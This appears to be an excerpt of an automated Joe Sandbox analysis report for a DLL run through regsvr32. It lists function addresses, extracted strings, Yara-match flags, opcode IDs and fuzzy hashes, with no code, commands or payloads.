                                    • Instruction Fuzzy Hash: 52F1C0B0505609DFCB98CF28C599ADA7BE0FF48348F41812EFC4A9B260D774DA68DB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002D098 Relevance: 5.3, Strings: 4, Instructions: 255COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Hwn$NR'$$fkD$}gK
                                    • API String ID: 0-1908897248
                                    • Opcode ID: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                    • Instruction ID: b3495f7b3258c7cfbbaf34d24a151d9f74cd673a76d708f913f7006ffd896b9d
                                    • Opcode Fuzzy Hash: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                    • Instruction Fuzzy Hash: 4AE1E6701083C8CBDBFADF64C889BDA7BACFB44708F105519EA0A9E258DB745789CB01
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800184E8 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !vT$3P$?gs $Y^u
                                    • API String ID: 0-3532888945
                                    • Opcode ID: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                    • Instruction ID: a130400614884e80b8bc041bf9d1a61bd98fb93a976fe1395b57ea9810b4de45
                                    • Opcode Fuzzy Hash: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                    • Instruction Fuzzy Hash: 72C1207160170DCBDBA8CF28C18A6CE3BE5FF48354F104129FC1A9A261D7B4EA59DB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800243F4 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: -,$7k A$k$2s
                                    • API String ID: 0-3102563331
                                    • Opcode ID: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                    • Instruction ID: bac349e1162b647475c44c7bb34b04b6f4b8289c4e67fa9b2355cb93066e8c6e
                                    • Opcode Fuzzy Hash: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                    • Instruction Fuzzy Hash: 36C1387151074D9BCF89DF28C88A5DD3BB1FB48398F566219FC4AA6260C7B4D584CF84
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180020F44 Relevance: 5.2, Strings: 4, Instructions: 202COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 76N$Ho<$]}$s5xe
                                    • API String ID: 0-3382501871
                                    • Opcode ID: 48f959005062580ac36a5c68606ec558c6a5f2e613880a1e5b76a83967194bde
                                    • Instruction ID: 0065c1d241d3448e2397ca8c0fa5a5365e82301828f7e764778ef267285b4530
                                    • Opcode Fuzzy Hash: 48f959005062580ac36a5c68606ec558c6a5f2e613880a1e5b76a83967194bde
                                    • Instruction Fuzzy Hash: 47A1E171504349CFCB95DF28C089ACA7BE0FF58308F42562AFC49A7255D774DAA8CB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001CD44 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <~]$@:$]U$]U
                                    • API String ID: 0-740249671
                                    • Opcode ID: f6acb40b154dde8fa3df42201c69f340e4f140856c7e7667b8c968f76e5b3c44
                                    • Instruction ID: 93bbccedb30105693727df547a8ee70240eea560fa1b67170d45bbd81435be64
                                    • Opcode Fuzzy Hash: f6acb40b154dde8fa3df42201c69f340e4f140856c7e7667b8c968f76e5b3c44
                                    • Instruction Fuzzy Hash: BC81387450660DCFDB69DF68D0867EE77F2FB24344F204029E815DA2A2D774CA19CB8A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000007FEF9D25E01 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                    Download Yara Rule
                                    Strings
                                    • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                    • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                    • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                    • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                    • API String ID: 0-1867057952
                                    • Opcode ID: ea889a4d0a0d63da2a4932dba4f80fda51d0f679e8992708aed7b5cf259d3687
                                    • Instruction ID: 816e6155049e65d920809caa47ac9e1d3897b88b3389a19d13bb62d5438e95d4
                                    • Opcode Fuzzy Hash: ea889a4d0a0d63da2a4932dba4f80fda51d0f679e8992708aed7b5cf259d3687
                                    • Instruction Fuzzy Hash: E2810D36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180022358 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: U!t$)$o}$q
                                    • API String ID: 0-3686089749
                                    • Opcode ID: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                    • Instruction ID: 504cee08a43b26f7e4edd141fcc1dad3608ee18550f5ec8ccdea89eebec808be
                                    • Opcode Fuzzy Hash: bf0474be6c6ce2e48f6d2d7926dbfb2caa288b201239c410f95da0c70b98d83b
                                    • Instruction Fuzzy Hash: 74918CB190030E8FCB48CF68D58A5DE7FB1FB68398F204219F85696254D77496A5CFC4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180003050 Relevance: 5.2, Strings: 4, Instructions: 159COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 4<$4<$Hhr$J;}
                                    • API String ID: 0-2050331814
                                    • Opcode ID: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                    • Instruction ID: 3d3ba58424421bda00612f90d71964148b60402fac749f980543760ede98840e
                                    • Opcode Fuzzy Hash: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                    • Instruction Fuzzy Hash: 7461F4B0615648DFDF58DF68C08A69A7BA1FB48354F00C12EFC1ADB294DB70DA58CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000EBAC Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;$;$eQ%$_
                                    • API String ID: 0-1753937898
                                    • Opcode ID: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                    • Instruction ID: 3574068fecf093fcbc9a635d24f3027655c33c427b378eb3a0ef079df85d540d
                                    • Opcode Fuzzy Hash: afea0fbc1d0f044595d14710a3cdc41d7bc72a212051bdcef0ffdf3ac8c4ab3c
                                    • Instruction Fuzzy Hash: 868137705003CCABDBFACF28CC997D93BA0FB49354F50822AE94A8E250DF745B499B40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000F048 Relevance: 5.1, Strings: 4, Instructions: 132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :U$<;?:${(${(
                                    • API String ID: 0-1086306767
                                    • Opcode ID: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                    • Instruction ID: ff3a3435717f4ead1b58fb824901535bd9cf299cdf9a7bd1c813f3606ded2d6e
                                    • Opcode Fuzzy Hash: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                    • Instruction Fuzzy Hash: 0861E0705187848BD768CF28C18965FBBF0FB8A748F10891EF68686260D7B6D948CB03
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180015DF4 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Oh$h<$t010$|N.
                                    • API String ID: 0-2324740333
                                    • Opcode ID: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                    • Instruction ID: 16379aaf1bb4413e0c13418f9d8c18c2bc98b7e827952bd0a9b5f9990c6c03cf
                                    • Opcode Fuzzy Hash: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                    • Instruction Fuzzy Hash: E051B1B090034A8BCF48DF68D48A4DE7FB1FB58398F60461DE85AAA250D37496A4CFC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002191C Relevance: 4.1, Strings: 3, Instructions: 336COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: GW$V{mu$dF
                                    • API String ID: 0-3399639152
                                    • Opcode ID: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                    • Instruction ID: 5d4924119bb90987b6c65e27c55bf51887eeb75551c0c0a5c8140b5b1edb0396
                                    • Opcode Fuzzy Hash: 13f3ce258387fdab81722341723304c211862b24c4b90673b1ab6d5c48b56b4d
                                    • Instruction Fuzzy Hash: B8F13F71508B888FD7B9CF28D48969EBBF0FB84744F20461EE5A59B270DBB49645CF02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002AC4C Relevance: 4.1, Strings: 3, Instructions: 330COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: K:$]w($n S$
                                    • API String ID: 0-3322466707
                                    • Opcode ID: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                    • Instruction ID: e698a885d6bb162bf0ff3cac371d937558b4210aa05752a6266eb715b4493fc4
                                    • Opcode Fuzzy Hash: c1684008171d4e306236772ac743a7b0f928483c20fc59153bd471c66e400ccf
                                    • Instruction Fuzzy Hash: 94F11570D047588BDBA8DFA8C88A6DDBBF0FB48304F60821DD85AAB251DB749949DF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180013B94 Relevance: 4.1, Strings: 3, Instructions: 322COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $L+$S'$$o%
                                    • API String ID: 0-4100028055
                                    • Opcode ID: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                    • Instruction ID: 179b9f87c3a4f9e214743648708db8209e3d71a45a824f016a1577c5ed2144a1
                                    • Opcode Fuzzy Hash: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                    • Instruction Fuzzy Hash: 34F1DFB1504609DFCB98DF28C0896DE7BE0FB58358F41812AFC4A9B264D770DA68DB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001D510 Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: D"C!$r>$7
                                    • API String ID: 0-4181936694
                                    • Opcode ID: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                    • Instruction ID: 0283378d108cf163dc6514248e6e0b5631fea62f1129ef615c9b8fd25e2e86b8
                                    • Opcode Fuzzy Hash: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                    • Instruction Fuzzy Hash: 1BE1EF70510B4CEBDBD9DF28D8CAADD3BA0FB48394FA06219FD0686250D775D989CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180017C8C Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 47T]$K_j$is[
                                    • API String ID: 0-2699472077
                                    • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                    • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                    • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180005E7C Relevance: 4.0, Strings: 3, Instructions: 288COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: B+=$Mt$[4
                                    • API String ID: 0-935141491
                                    • Opcode ID: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                    • Instruction ID: bf1f234f614a92c8f0daef92778263c373ce788cc2d228a45e1a9745d38385ec
                                    • Opcode Fuzzy Hash: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                    • Instruction Fuzzy Hash: 36F1D470505B888FDBB9DF24CC897EB7BA0FB94316F10551EE84A9A290DFB49648CF41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018000F678 Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $c7$@%?5$b3
                                    • API String ID: 0-1970763919
                                    • Opcode ID: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                    • Instruction ID: 7544b270a4a1d87a4c453583f66bfc56a0d33d7204b7a287ddb0882fb61d0d22
                                    • Opcode Fuzzy Hash: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                    • Instruction Fuzzy Hash: 48E158B5902748CFCB88DF68C69A59D7BF1FF59308F404029FC1A9A264D7B4D928CB49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180011904 Relevance: 4.0, Strings: 3, Instructions: 235COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #^$`]$%
                                    • API String ID: 0-102912427
                                    • Opcode ID: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                    • Instruction ID: 878e7741f870b7fe1bc6c0f4a33361fdae8fd10665ac772b8c524eb0937c225a
                                    • Opcode Fuzzy Hash: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                    • Instruction Fuzzy Hash: FDB1277090474D8FCF48CF68C88A6DE7BF0FB48398F165219E85AA6250D778D549CF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180014AA4 Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: EQp$JK8[$kU
                                    • API String ID: 0-1401246002
                                    • Opcode ID: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                    • Instruction ID: 75ff6837d11cf9dd0609e11c9b8f3cf17f900585419d92be27056132c399e7dd
                                    • Opcode Fuzzy Hash: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                    • Instruction Fuzzy Hash: 2EB1587190474DCBCF88CF68C48A6DE7BF0FB58358F165219E94AA6260C778D584CF89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800171B8 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /@=`$h$zJ
                                    • API String ID: 0-1145068787
                                    • Opcode ID: 058fb21ebd37bd9eb3c247c823e69362e4f90846d4c9b1e02e85b924af49b442
                                    • Instruction ID: efaff62c6dea5b666cd0ec5e1287633bd35f75f1b854ced8b25ae11fb6165d3c
                                    • Opcode Fuzzy Hash: 058fb21ebd37bd9eb3c247c823e69362e4f90846d4c9b1e02e85b924af49b442
                                    • Instruction Fuzzy Hash: 74A12F70608B4C8BEB9ADF18C4857DD7BF1FB49384F508559F84A86292CB34DA49CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180029710 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $g$>6$nB
                                    • API String ID: 0-1868063892
                                    • Opcode ID: ff2a3d7c641745ffb25121b662fa46cfa0900d035ad6a59b85364cfb369e7909
                                    • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                    • Opcode Fuzzy Hash: ff2a3d7c641745ffb25121b662fa46cfa0900d035ad6a59b85364cfb369e7909
                                    • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180012BB8 Relevance: 4.0, Strings: 3, Instructions: 229COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #\9$Vj+&$M
                                    • API String ID: 0-3658199817
                                    • Opcode ID: b54fe4db0c482ebc48653361818c1ec5b550a7c5ec628dbf807c67c5d3739686
                                    • Instruction ID: 26c1b974044aa0bae0d49f3ac843ec2fe1acc35572613d15cd803358aab69238
                                    • Opcode Fuzzy Hash: b54fe4db0c482ebc48653361818c1ec5b550a7c5ec628dbf807c67c5d3739686
                                    • Instruction Fuzzy Hash: FEA144709147098FCB48CFA8D88A5DEBBF0FB48318F11421DE89AB7250D778A945CF99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180027E14 Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #X$d,U$d3
                                    • API String ID: 0-3246363944
                                    • Opcode ID: b19347f6a86a0bef7f71d8365dac67f13c927bf2e0e4be2ddf998f75a428a595
                                    • Instruction ID: e67d37b33042bdc2b75ebe9cceb0670a2214c716ea8b8408a91d9fe0cb16ea97
                                    • Opcode Fuzzy Hash: b19347f6a86a0bef7f71d8365dac67f13c927bf2e0e4be2ddf998f75a428a595
                                    • Instruction Fuzzy Hash: 84C1F9715093C8CBDBBEDF64C885BDA3BA9FB44708F10521DEA0A9E258CB745749CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018001447C Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: X9T[$Y)~$Zo
                                    • API String ID: 0-3816472334
                                    • Opcode ID: 4d45b44019f37ffc6e1bc3352b37dca48114cbe71f71f11aaeec7abd6044a81e
                                    • Instruction ID: 74daf22561f986eaee31dd2e877d7e0390ad28e8a973cc345c4d359d4462c4de
                                    • Opcode Fuzzy Hash: 4d45b44019f37ffc6e1bc3352b37dca48114cbe71f71f11aaeec7abd6044a81e
                                    • Instruction Fuzzy Hash: A8A17CB5A02749CBCF48DF68C29A59D7BF1BF49304F408129FC1A9A360E3B5E525CB49
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00000001800141C8 Relevance: 3.9, Strings: 3, Instructions: 138COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: HR$HR$K)
                                    • API String ID: 0-1226256413
                                    • Opcode ID: fe1a1f4cc53af174484b1611b8e08b9bf30ae67f3885f7bd771c709debbd063f
                                    • Instruction ID: e79f82d9c1651787cdde5b7f69db4956d02e0856481d2681396fdc662c453c95
                                    • Opcode Fuzzy Hash: fe1a1f4cc53af174484b1611b8e08b9bf30ae67f3885f7bd771c709debbd063f
                                    • Instruction Fuzzy Hash: 7B511971A08B0D8FDB58DFE8C4856EEBBF1FB48354F004119E81AB72A4C7749A09CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002CCE0 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ]u$"$:;
                                    • API String ID: 0-2021956800
                                    • Opcode ID: e5b729e8d3ca91e6ffaa64c5216b9ad0038ed08cda9d2019842c7aa3bd36f9ee
                                    • Instruction ID: 26b28f3a503e825e1842dbf9688ebde44fe9506c1339f803b7779101942ae612
                                    • Opcode Fuzzy Hash: e5b729e8d3ca91e6ffaa64c5216b9ad0038ed08cda9d2019842c7aa3bd36f9ee
